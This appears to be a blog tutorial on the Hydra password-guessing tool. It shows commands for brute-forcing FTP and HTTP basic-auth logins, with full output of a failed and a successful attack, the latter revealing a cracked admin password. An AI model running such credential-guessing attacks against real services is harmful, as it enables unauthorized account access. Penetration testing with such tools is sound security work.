Hydra is a tool that performs online attacks to guess a valid user & password from a network service.
I've tried it over mysql databases, ftp, http, https, web forms.
There are alternatives like medusa and ncrack, a full online attack may be performed with the three tools, each one can be more successful or faster for every the type of service.
Help and further instructions will be displayed with:
- hydra -h
- hydra -U http-post-form
The -U option shows help and examples, especially for the web form attacks. You will need to know deeply how the web form works to perform a successful attack. Tools like
Burp Suite will help to track the requests, headers and responses generated by the login pages.
To perform an unsuccessful attack for a ftp service:
hydra 255.255.255.254 ftp -l ftpuser -P /wordlists/passwords.lst -vV
Only one username (-l option) and file with a list of passwords (-P option) -vV for verbosity and
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2016-01-25 17:44:07
[DATA] max 16 tasks per 1 server, overall 64 tasks, 16 login tries (l:1/p:16), ~0 tries per task
[DATA] attacking service ftp on port 21
[VERBOSE] Resolving addresses ... done
[ATTEMPT] target 255.255.255.254 - login "pruebaftp" - pass "dic" - 1 of 16 [child 0]
[ATTEMPT] target 255.255.255.254 - login "pruebaftp" - pass "nov" - 2 of 16 [child 1]
[ATTEMPT] target 255.255.255.254 - login "pruebaftp" - pass "oct" - 3 of 16 [child 2]
[ATTEMPT] target 255.255.255.254 - login "pruebaftp" - pass "sep" - 4 of 16 [child 3]
[ATTEMPT] target 255.255.255.254 - login "pruebaftp" - pass "ago" - 5 of 16 [child 4]
[ATTEMPT] target 255.255.255.254 - login "pruebaftp" - pass "jul" - 6 of 16 [child 5]
[ATTEMPT] target 255.255.255.254 - login "pruebaftp" - pass "jun" - 7 of 16 [child 6]
[ATTEMPT] target 255.255.255.254 - login "pruebaftp" - pass "may" - 8 of 16 [child 7]
[ATTEMPT] target 255.255.255.254 - login "pruebaftp" - pass "abr" - 9 of 16 [child 8]
[ATTEMPT] target 255.255.255.254 - login "pruebaftp" - pass "mar" - 10 of 16 [child 9]
[ATTEMPT] target 255.255.255.254 - login "pruebaftp" - pass "feb" - 11 of 16 [child 10]
[ATTEMPT] target 255.255.255.254 - login "pruebaftp" - pass "ene" - 12 of 16 [child 11]
[ATTEMPT] target 255.255.255.254 - login "pruebaftp" - pass "mateo" - 13 of 16 [child 13]
[ATTEMPT] target 255.255.255.254 - login "pruebaftp" - pass "staff" - 14 of 16 [child 6]
[ATTEMPT] target 255.255.255.254 - login "pruebaftp" - pass "inf" - 15 of 16 [child 12]
[ATTEMPT] target 255.255.255.254 - login "pruebaftp" - pass "matias" - 16 of 16 [child 15]
[STATUS] attack finished for 255.255.255.254 (waiting for children to complete tests)
[STATUS] 16.00 tries/min, 16 tries in 00:01h, 1 todo in 00:01h, 5 active
[VERBOSE] Retrying connection for child 13
[VERBOSE] Retrying connection for child 12
[VERBOSE] Retrying connection for child 3
[VERBOSE] Retrying connection for child 14
[VERBOSE] Retrying connection for child 15
1 of 1 target completed, 0 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-01-25 17:45:16
The attack failed because a valid pair user-password wasn't found, the option -L could help replacing the single "-l admin" username with a list of usernames (-L usernames.lst)
To perform a successful attack to an http basic authentication service which resides in folder "stats":
hydra 255.255.255.254 http-get -m /stats -l admin -P list.lst -e nsr -vV
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2016-01-26 09:38:08
[DATA] max 16 tasks per 1 server, overall 64 tasks, 20 login tries (l:1/p:20), ~0 tries per task
[DATA] attacking service http-get on port 80
[VERBOSE] Resolving addresses ... done
[ATTEMPT] 255.255.255.254 - login "admin" - pass "admin" - 1 of 20 [child 0]
[ATTEMPT] 255.255.255.254 - login "admin" - pass "" - 2 of 20 [child 1]
[ATTEMPT] 255.255.255.254 - login "admin" - pass "nimda" - 3 of 20 [child 2]
[ATTEMPT] 255.255.255.254 - login "admin" - pass "dic" - 4 of 20 [child 3]
[ATTEMPT] 255.255.255.254 - login "admin" - pass "nov" - 5 of 20 [child 4]
[ATTEMPT] 255.255.255.254 - login "admin" - pass "oct" - 6 of 20 [child 5]
[ATTEMPT] 255.255.255.254 - login "admin" - pass "sep" - 7 of 20 [child 6]
[ATTEMPT] 255.255.255.254 - login "admin" - pass "ago" - 8 of 20 [child 7]
[ATTEMPT] 255.255.255.254 - login "admin" - pass "jul" - 9 of 20 [child 8]
[ATTEMPT] 255.255.255.254 - login "admin" - pass "jun" - 10 of 20 [child 9]
[ATTEMPT] 255.255.255.254 - login "admin" - pass "may" - 11 of 20 [child 10]
[ATTEMPT] 255.255.255.254 - login "admin" - pass "abr" - 12 of 20 [child 11]
[ATTEMPT] 255.255.255.254 - login "admin" - pass "mar" - 13 of 20 [child 12]
[ATTEMPT] 255.255.255.254 - login "admin" - pass "feb" - 14 of 20 [child 13]
[ATTEMPT] 255.255.255.254 - login "admin" - pass "ene" - 15 of 20 [child 14]
[ATTEMPT] 255.255.255.254 - login "admin" - pass "Dic.2015" - 16 of 20 [child 15]
[ATTEMPT] 255.255.255.254 - login "admin" - pass "mateo" - 17 of 20 [child 1]
[ATTEMPT] 255.255.255.254 - login "admin" - pass "staff" - 18 of 20 [child 8]
[ATTEMPT] 255.255.255.254 - login "admin" - pass "inf" - 19 of 20 [child 2]
[ATTEMPT] 255.255.255.254 - login "admin" - pass "matias" - 20 of 20 [child 3]
[STATUS] attack finished for prueba.edatel.net.co (waiting for children to complete tests)
[80][http-get] host: 255.255.255.254 login: admin password: Dic.2015
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-01-26 09:38:08
The attack tried the null password, login as password and reverse login as password (option -e nsr) and found a valid pair user-password, the quality of the dictionary of words is the key to success,
If you're are not a fan of the command line tools try Xhydra, a graphical front-end to build and customize your attack.